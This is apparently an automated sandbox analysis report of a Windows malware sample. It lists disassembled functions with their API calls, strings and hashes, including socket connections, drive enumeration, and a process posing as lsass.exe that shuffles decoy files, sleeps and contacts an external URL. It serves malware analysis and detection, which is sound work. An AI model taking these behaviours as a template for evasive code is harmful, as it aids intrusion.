Function 009AD33E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

Part of subcall function 009A3B80: GetTickCount.KERNEL32 ref: 009A3B86

htonl.WS2_32(?), ref: 009AD387

Part of subcall function 009A35D0: EnterCriticalSection.KERNEL32(00000001,00000001,?,009B403F,00000001,?,009B3F8F,-00000007,?,009AEEB2,-00000053,?,009AEE82,-00804C3B,?,009AED83), ref: 009A35DB

memcmp.MSVCRT ref: 009AD4AC
memmove.MSVCRT ref: 009AD520

Strings

P, xrefs: 009AD417

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: CountCriticalEnterSectionTickhtonlmemcmpmemmove
String ID: P
API String ID: 495902089-3110715001
Opcode ID: 5e3a35d1365b5a2f43e2e6e91569404c1e2257988a8ed199e09e3dbe8b6d085b
Instruction ID: f3dc0808025ff7f659a6fa123178975ada8fbb4b81031b03c50a7ef3bc89c57e
Opcode Fuzzy Hash: 5e3a35d1365b5a2f43e2e6e91569404c1e2257988a8ed199e09e3dbe8b6d085b
Instruction Fuzzy Hash: 585197B4D0151A9BDB18DB94CC91BFEB776BF95304F0485A8F11AA7282E7349A44CF50

Uniqueness

Uniqueness Score: -1.00%

Function 009B07F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32(009B07CF), ref: 009B07FD
QueryDosDeviceW.KERNEL32(009B07CF,?,00000208), ref: 009B083C
StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 009B0854

Strings

\??\, xrefs: 009B0848

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: DeviceDriveQueryType
String ID: \??\
API String ID: 1681518211-3047946824
Opcode ID: 2f27d02baa6ac4741a39e755ba5dde9e5669e0fbf03cf1e3939435bde512728c
Instruction ID: 1dc5764a17c0bf284759a4156e92920b8e9997ea12aa87010cdcfd17bc5b2ed6
Opcode Fuzzy Hash: 2f27d02baa6ac4741a39e755ba5dde9e5669e0fbf03cf1e3939435bde512728c
Instruction Fuzzy Hash: EC01FFB4D4020CDBCB20DF95DE49BDAB7B8AB44714F0081A9EA09A7140D6719B85DFD4

Uniqueness

Uniqueness Score: -1.00%

Function 009A69E0 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 227stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 009A6B61
task.LIBCPMTD ref: 009A7004

Strings

%s %s %s, xrefs: 009A6A57
%s %s %s, xrefs: 009A6C1F
://, xrefs: 009A6A75

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: lstrlentask
String ID: %s %s %s$%s %s %s$://
API String ID: 773520081-748371927
Opcode ID: 54c1e9c195043bb65a6d9071a6556f6b5415e38f4f32ac33237d639db3ec19e1
Instruction ID: 5805850142b886633d1b2c24b4b91fc70465d9c72c9bca61f6dedc429be74959
Opcode Fuzzy Hash: 54c1e9c195043bb65a6d9071a6556f6b5415e38f4f32ac33237d639db3ec19e1
Instruction Fuzzy Hash: A491B171A042289FDF28CF64CC44BEEB7B9BF55304F088598F209A6291D7759E84CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 009AD040 Relevance: 6.2, APIs: 4, Instructions: 202stringnetworkCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 009AD088
memmove.MSVCRT ref: 009AD0C5
lstrlenA.KERNEL32(?,00000003,00000004,00000000,00000003,0000000D,00000000,00000000,?,?,?,00000001), ref: 009AD167
htons.WS2_32(?), ref: 009AD23A

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: htonslstrlenmemcmpmemmove
String ID:
API String ID: 302187628-0
Opcode ID: 48038ce5aea32d06a5396dcc5694d91b214282bb129d9d07b81e7c6b3e5c5228
Instruction ID: 7560c8f21855dfe16f89605a42c9dff0475f2e99c3942826db7f72cda0b085b7
Opcode Fuzzy Hash: 48038ce5aea32d06a5396dcc5694d91b214282bb129d9d07b81e7c6b3e5c5228
Instruction Fuzzy Hash: C6719170E0821A9BDB14CBA4DC91BFFB775AF85300F148119F9626B2C2D778A946CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 009AB3E0 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 009AB53E
memmove.MSVCRT ref: 009AB5AC
memcmp.MSVCRT ref: 009AB5F9

Strings

\, xrefs: 009AB5CC

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: memmove$memcmp
String ID: \
API String ID: 845337883-2967466578
Opcode ID: 74fcf3e4d10a9c81c09dcf7789ae585a115708f4be19fe9ccfb8603a070d1ead
Instruction ID: ab08f96c95187824746ad41d8495c8d0a4bae88f3910732f65a733fd65822e8d
Opcode Fuzzy Hash: 74fcf3e4d10a9c81c09dcf7789ae585a115708f4be19fe9ccfb8603a070d1ead
Instruction Fuzzy Hash: 8C71A470D0025C9BDB14CB54CC517EDBBB9AF9A304F1881E8E589AB243DB349B949F94

Uniqueness

Uniqueness Score: -1.00%

Function 009AE780 Relevance: 6.2, APIs: 4, Instructions: 154networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 009AE7C9

Part of subcall function 009A35B0: GetProcessHeap.KERNEL32(?,009AE7DC), ref: 009A35B3

WSACleanup.WS2_32 ref: 009AE9FF

Part of subcall function 009A3C60: GetSystemTimeAsFileTime.KERNEL32(?), ref: 009A3D9B

Part of subcall function 009A2120: memmove.MSVCRT ref: 009A2194
Part of subcall function 009A2120: CryptAcquireContextA.ADVAPI32(009BA014,00000000,?,0000000D,F0000000), ref: 009A21DE
Part of subcall function 009A2120: CryptAcquireContextA.ADVAPI32(009BA11C,00000000,?,00000018,F0000000), ref: 009A21FA
Part of subcall function 009A2120: CryptReleaseContext.ADVAPI32(?,00000000), ref: 009A2223
Part of subcall function 009A2120: CryptReleaseContext.ADVAPI32(?,00000000), ref: 009A223C

CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 009AE80F

Part of subcall function 009A35D0: EnterCriticalSection.KERNEL32(00000001,00000001,?,009B403F,00000001,?,009B3F8F,-00000007,?,009AEEB2,-00000053,?,009AEE82,-00804C3B,?,009AED83), ref: 009A35DB

Part of subcall function 009A8E30: socket.WS2_32(00000002,00000001,00000006), ref: 009A8E40
Part of subcall function 009A8E30: setsockopt.WS2_32(00000000,0000FFFF,00000004,00000001,00000004), ref: 009A8E73
Part of subcall function 009A8E30: htons.WS2_32(00000000), ref: 009A8E8C
Part of subcall function 009A8E30: htonl.WS2_32(7F000001), ref: 009A8EA4
Part of subcall function 009A8E30: bind.WS2_32(00000000,?,00000010), ref: 009A8EB9
Part of subcall function 009A8E30: listen.WS2_32(00000000,00000064), ref: 009A8ED0
Part of subcall function 009A8E30: getsockname.WS2_32(00000000,?,00000010), ref: 009A8EF4
Part of subcall function 009A8E30: htons.WS2_32(?), ref: 009A8F2D
Part of subcall function 009A8E30: htons.WS2_32(?), ref: 009A8F56

CloseHandle.KERNEL32(?,00000000,00000000,00000000), ref: 009AE9CE

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: ContextCrypt$htons$AcquireReleaseTime$CleanupCloseCompletionCreateCriticalEnterFileHandleHeapPortProcessSectionStartupSystembindgetsocknamehtonllistenmemmovesetsockoptsocket
String ID:
API String ID: 3177777191-0
Opcode ID: a13ca9ffd45825b26002d5d5bb8a2d900eee2ed8c9e1631225c65e0f48a0da2c
Instruction ID: 86491ac49c767ddacd02970a1481ee19afbcedbda25591061e06ae2ad50e2322
Opcode Fuzzy Hash: a13ca9ffd45825b26002d5d5bb8a2d900eee2ed8c9e1631225c65e0f48a0da2c
Instruction Fuzzy Hash: 5F518F70B012245FEB659B14CC66BAAB375BF87308F4441D8F68D6A2C2D6359E80CFD2

Uniqueness

Uniqueness Score: -1.00%

Function 009AEB80 Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 009AEBA4
??2@YAPAXI@Z.MSVCRT ref: 009AEBD3
codecvt.LIBCPMTD ref: 009AEC91
codecvt.LIBCPMTD ref: 009AECC4

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: ??2@codecvt
String ID:
API String ID: 664657501-0
Opcode ID: daa78c124cd3077f298454ed31f8a66723e2a8a82edd25a7d5b43721621305ac
Instruction ID: 4338ddee62760d66968e77654126d3593f24bc333a2f24dba505b25431debe3d
Opcode Fuzzy Hash: daa78c124cd3077f298454ed31f8a66723e2a8a82edd25a7d5b43721621305ac
Instruction Fuzzy Hash: 4D41AE70D1C209DFDB04CF95D9983AEBBF0BB45324F148529E442272A1D3790A84DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 009A54B0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 87stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 009A5526
lstrlenA.KERNEL32(?), ref: 009A5597

Strings

net, xrefs: 009A5537
net, xrefs: 009A55A8

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: lstrlen
String ID: net$net
API String ID: 1659193697-813024420
Opcode ID: 8c94581275f34775db6a8e55ff9b505af0b70b957029b1361e9ed60ae861bfb5
Instruction ID: 8a55d15128d961c5f46f5183453553c7dc938b17da314398e7d67019c3445e65
Opcode Fuzzy Hash: 8c94581275f34775db6a8e55ff9b505af0b70b957029b1361e9ed60ae861bfb5
Instruction Fuzzy Hash: 85318E74A5420CEBDB18CBA4CD96FEDB7B8BB49314F144198E605E7280D6B09F84DF90

Uniqueness

Uniqueness Score: -1.00%

Function 009B1000 Relevance: 6.1, APIs: 4, Instructions: 85sleepthreadCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,009BA128,00000208), ref: 009B1015

Part of subcall function 009B01E0: _wfopen.MSVCRT ref: 009B01F6
Part of subcall function 009B01E0: fseek.MSVCRT ref: 009B0209
Part of subcall function 009B01E0: ftell.MSVCRT ref: 009B0215
Part of subcall function 009B01E0: fclose.MSVCRT ref: 009B0224

ExitThread.KERNEL32 ref: 009B1117

Part of subcall function 009B0870: GetLogicalDrives.KERNEL32 ref: 009B0876
Part of subcall function 009B0870: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 009B08C4
Part of subcall function 009B0870: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 009B08F1
Part of subcall function 009B0870: RegCloseKey.ADVAPI32(?), ref: 009B090E

GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 009B10AE
Sleep.KERNEL32(000007D0), ref: 009B110A

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: CloseDrivesExitFileInformationLogicalModuleNameOpenQuerySleepThreadValueVolume_wfopenfclosefseekftell
String ID:
API String ID: 3729102641-0
Opcode ID: 7a126df46a2384ddaedc1e091f3cd9eb66c30c78d9c25cf41acf8b78b2cf01ca
Instruction ID: dc58ddf27dd7db0ccfe8754d0e48d2e0b9dd5b801768a5439068d9dfb831e4cf
Opcode Fuzzy Hash: 7a126df46a2384ddaedc1e091f3cd9eb66c30c78d9c25cf41acf8b78b2cf01ca
Instruction Fuzzy Hash: 3B31F171D18208BBDB14EBE8DE6ABEEB778EF84714F504059E205A6180D674DA84CF62

Uniqueness

Uniqueness Score: -1.00%

Function 009A49C0 Relevance: 6.1, APIs: 4, Instructions: 84networkCOMMON

Download Yara Rule

APIs

Part of subcall function 009A7020: getaddrinfo.WS2_32(00000000,?,00000001,00000006), ref: 009A705F

socket.WS2_32(?,?,?), ref: 009A4A1E
connect.WS2_32(000000FF,?,?), ref: 009A4A48
freeaddrinfo.WS2_32(?), ref: 009A4AA5

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: connectfreeaddrinfogetaddrinfosocket
String ID:
API String ID: 952663764-0
Opcode ID: 1ebe3e5b9fc3ed64852e223b6d56740de40862b5444e5f6e1dee9de48ee50f01
Instruction ID: 284846ac84a898687229f9fce6bfaa7171c6ea1d73226108709a92504465e4bd
Opcode Fuzzy Hash: 1ebe3e5b9fc3ed64852e223b6d56740de40862b5444e5f6e1dee9de48ee50f01
Instruction Fuzzy Hash: A5314FB8A04209EFCB04CF94C944AAEB7B9BF89300F14C699E8259B381C771DE41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 009B1130 Relevance: 6.1, APIs: 4, Instructions: 62fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000001,C0000000,?,00000000,00000000,?,00000000,?,00000002,00000001,00000080), ref: 009B1153
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002), ref: 009B116C
WriteFile.KERNEL32(000000FF,?,?,00000000,00000000), ref: 009B1198
CloseHandle.KERNEL32(000000FF), ref: 009B11CD

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: File$CloseCreateHandlePointerWrite
String ID:
API String ID: 3604237281-0
Opcode ID: c53df0cc27a4454441c12d0a3c783e6b84900a1b2f9ce195f9dd441df25ab328
Instruction ID: 9d92dc628b097b911bf06050297430058d935644c891f4326b5e90e31e42eb0f
Opcode Fuzzy Hash: c53df0cc27a4454441c12d0a3c783e6b84900a1b2f9ce195f9dd441df25ab328
Instruction Fuzzy Hash: BF211F75A14208FFDB14DFA8CE95FDEBB79AF48310F108688E615A7280D774AA40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 009B01E0 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

_wfopen.MSVCRT ref: 009B01F6
fseek.MSVCRT ref: 009B0209
ftell.MSVCRT ref: 009B0215
fclose.MSVCRT ref: 009B0224

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: _wfopenfclosefseekftell
String ID:
API String ID: 3257356417-0
Opcode ID: 3ba77f8a07c285d4d3af5850b82b864ca9e252133149c934813cfcab9d273ab0
Instruction ID: 651ba4ad3488059c666783522a76e84dca7166b109683e39c12f4a76226c4354
Opcode Fuzzy Hash: 3ba77f8a07c285d4d3af5850b82b864ca9e252133149c934813cfcab9d273ab0
Instruction Fuzzy Hash: 76F0ACB5D00208BBDB10EBA49E46B9D7B789B84710F1045A4FA146B242E575AF14AB91

Uniqueness

Uniqueness Score: -1.00%

Function 009A8FD0 Relevance: 6.0, APIs: 4, Instructions: 24synchronizationthreadCOMMON

Download Yara Rule

APIs

closesocket.WS2_32(00000000), ref: 009A8FE7
WaitForSingleObject.KERNEL32(00000000,00001388,00000000,?,009AE987,00000000,00000000,00000000), ref: 009A8FF9
TerminateThread.KERNEL32(00000000,00000000,?,009AE987,00000000,00000000,00000000), ref: 009A9008
CloseHandle.KERNEL32(00000000,?,009AE987,00000000,00000000,00000000), ref: 009A9014

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: CloseHandleObjectSingleTerminateThreadWaitclosesocket
String ID:
API String ID: 1562794747-0
Opcode ID: 20fab0756399d54048fc481a11e52610c281dc7a14da17c1603a4ebddff31717
Instruction ID: d7d51eb7b09b8a427766b904a43b7431b98fef7a4d38ec68963d5b84cd18328c
Opcode Fuzzy Hash: 20fab0756399d54048fc481a11e52610c281dc7a14da17c1603a4ebddff31717
Instruction Fuzzy Hash: FCF0303113D704AFCB00EBA8EE08F193B6CAB09739F004344F715862A0D6B5D805A7A0

Uniqueness

Uniqueness Score: -1.00%

Function 009A4220 Relevance: 5.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 009A4264
GlobalFree.KERNEL32(00000000), ref: 009A42FE
GlobalFree.KERNEL32(00000000), ref: 009A430E
GlobalFree.KERNEL32(00000000), ref: 009A431E

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: FreeGlobal$ErrorLast
String ID:
API String ID: 1236395209-0
Opcode ID: cea82e6fcb4969c632a156e29b6b5367e2e97a00dfda92234c92b68cf212f1d6
Instruction ID: 18e8182f7b91a84ebc6e2efee0cecd691df588da8a221801575084c4df293d78
Opcode Fuzzy Hash: cea82e6fcb4969c632a156e29b6b5367e2e97a00dfda92234c92b68cf212f1d6
Instruction Fuzzy Hash: 1431B275948249EBCF10DBF8DC687FE7B789FA2301F148158F81496181DBB49748CBA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: lsass.exePID: 5308, Parent PID: 4004COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	878
Total number of Limit Nodes:	6

Executed Functions

Function 00781360 Relevance: 954.4, APIs: 501, Strings: 43, Instructions: 2386filesleepnetworkCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0,?,?,?,007843AE,00000000,?,0000000A), ref: 00781374
FindWindowA.USER32(f5d4s54s4sds5d5d5d,00000000), ref: 007813A7
Sleep.KERNEL32(0000C350), ref: 007813C5
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 007813D0
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 007813E0
MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 00781414
Sleep.KERNEL32(00000FA0), ref: 0078141F
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 0078142A
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 0078143A
Sleep.KERNEL32(00000FA0), ref: 00781445
DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 00781450
Sleep.KERNEL32(00002710), ref: 0078145D
DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 00781468
Sleep.KERNEL32(00001770), ref: 00781473
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 00781483
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 0078148E
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 0078149E
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 007814A9
Sleep.KERNEL32(00000BB8), ref: 007814B4
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 007814BF
Sleep.KERNEL32(00000BB8), ref: 007814CA
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 007814DA
InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36,00000000,00000000,00000000,00000000), ref: 007814ED
DeleteFileW.KERNEL32(w4twywyw4yw4yw4yw4y), ref: 007814FE
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 00781516
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 00781526
Sleep.KERNEL32(00001388), ref: 00781531
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 0078153C
Sleep.KERNEL32(00000BB8), ref: 00781547
DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 00781552
InternetOpenUrlA.WININET(00000000,http://www.48838389493.jo/,00000000,00000000,00000000,00000000), ref: 0078156C
Sleep.KERNEL32(000007D0), ref: 0078157D
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 007815BD
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 007815C8
Sleep.KERNEL32(000007D0), ref: 007815D3
MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 007815E3
Sleep.KERNEL32(00000FA0), ref: 007815EE
DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 007815F9
InternetCloseHandle.WININET(00000000), ref: 00781608
DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 00781613
Sleep.KERNEL32(00001B58), ref: 0078161E
InternetCloseHandle.WININET(00000000), ref: 0078162B
Sleep.KERNEL32(00002710), ref: 00781636
ShowWindow.USER32(00000000,00000001), ref: 00781645
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 00781650
SetForegroundWindow.USER32(00000000), ref: 0078165D
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 00781668
CloseWindow.USER32(00000000), ref: 00781675
MoveFileA.KERNEL32(f5d4s54s4sds5d5d5d,3r3hr8h38h8h38f8hff), ref: 00781685
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 007816CB
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 007816D6
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 007816E6
Sleep.KERNEL32(000007D0), ref: 007816F1
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 007816FC
DeleteFileA.KERNEL32(3r3hr8h38h8h38f8hff), ref: 00781707
